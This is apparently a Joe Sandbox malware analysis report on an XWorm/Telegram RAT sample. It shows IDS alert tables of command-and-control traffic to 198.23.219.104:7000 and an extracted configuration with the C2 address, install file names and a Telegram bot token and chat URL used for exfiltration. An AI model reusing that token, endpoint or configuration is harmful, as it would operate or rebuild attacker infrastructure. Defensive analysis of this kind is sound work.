2024-10-13T19:03:17.343599+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:17.442659+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:19.496920+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.531333+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.625393+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.670116+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.731529+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.775017+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:22.953957+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:23.050690+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:23.181699+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:24.510097+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:29.523241+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:30.500329+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:31.557998+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:32.875118+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:34.522772+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:34.652184+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:35.765177+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:38.016178+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:38.781406+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:38.878311+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:38.968783+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:38.998883+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.098223+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.194156+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.434283+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.571982+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:42.609049+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:44.108830+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:44.853754+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:44.854979+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:49.521847+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:51.484850+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:54.521956+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:58.406779+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:59.437502+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:59.630268+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:03.218492+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:04.522879+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:04.797907+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:08.751591+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:09.441171+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:09.571579+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:14.521346+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:14.937113+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:15.026057+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:15.121442+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:19.527105+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:20.312041+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:24.218338+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:24.521560+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.186626+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.248410+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.283748+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.379334+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.474766+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.529500+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.569982+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:26.952630+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:29.281141+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:29.521201+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:31.485110+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:34.521100+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:36.002479+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:36.039005+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:39.439166+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:39.527841+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:40.867167+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:44.520683+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:46.611127+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:49.520751+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:54.547630+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:59.524112+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:00.991767+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.233229+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.296063+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.321903+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.376986+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.471174+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.565956+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.749449+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.990278+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:03.909624+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:04.521062+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:06.842611+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:09.908847+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:09.908898+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:09.908933+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:10.057053+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:12.483271+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:14.521260+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:14.654711+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:18.032225+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:19.520978+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:24.536728+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:29.536508+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:32.877198+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:34.536046+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:39.442303+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:39.574643+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T19:01:38.390237+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:01:53.097464+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:07.940890+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:22.783942+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:28.832323+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:40.923936+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:41.012746+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:41.017723+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:41.725337+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:41.833112+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.033371+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.417035+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.514104+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.519248+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.610876+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:02:51.617084+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:01.580014+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:07.082246+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:07.168610+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:07.265092+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:17.348738+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:17.448743+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:22.723688+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:22.732441+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:22.776004+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:22.955379+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:23.051992+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:23.183461+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:23.279890+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:23.285081+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:30.502024+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:32.876891+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:34.653709+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:35.769751+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:38.020434+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:38.783111+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:38.879917+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:38.970203+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:39.000297+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:39.099952+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:39.195777+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:42.611151+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:44.115115+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:51.490292+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:58.414732+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:59.440157+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:59.536181+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:03:59.541481+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:03.221148+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:04.799393+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:08.753397+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:14.941337+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:15.027365+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:15.122707+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:20.317237+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:24.227813+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.189851+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.250473+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.285413+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.380984+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.476203+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.533935+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.573863+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:26.953644+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:29.282554+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:31.486425+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:36.043671+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:40.868044+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:46.612000+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:00.992732+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.234194+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.296893+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.472203+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.524860+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.529937+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.566864+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.750227+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.997514+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:03.913428+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:06.843482+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:10.058460+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:12.486973+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:14.655457+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:18.033934+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:32.878074+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T19:01:39.383490+0200	2852874	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:09.399936+0200	2852874	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:39.411926+0200	2852874	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:09.428549+0200	2852874	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:39.434283+0200	2852874	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:09.441171+0200	2852874	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:39.439166+0200	2852874	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:09.908847+0200	2852874	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:39.442303+0200	2852874	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PCShutdown Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T19:03:31.557998+0200	2853954	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T19:02:51.124679+0200	2853193	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.23.219.104	7000	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000006F.00000002.4110701337.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["198.23.219.104"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram URL": "https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475"}
Source: sB2ClgrGng.exe.2892.1.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\word.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Roaming\word.exe	Virustotal: Detection: 79%			Perma Link

Multi AV Scanner detection for submitted file

Source: sB2ClgrGng.exe	ReversingLabs: Detection: 52%
Source: sB2ClgrGng.exe	Virustotal: Detection: 67%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: 198.23.219.104
Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: 7000
Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: <123456789>
Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: <Xwormmm>
Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: RK New Staup
Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: USB.exe
Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: %AppData%
Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: word.exe
Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: 7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc
Source: 15.0.bound.exe.2f0000.0.unpack	String decryptor: -1002219810475

Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe

Code function: 84_2_00007FF71F0A901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

84_2_00007FF71F0A901C

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: sB2ClgrGng.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: sB2ClgrGng.exe, 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: sB2ClgrGng.exe, 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmp
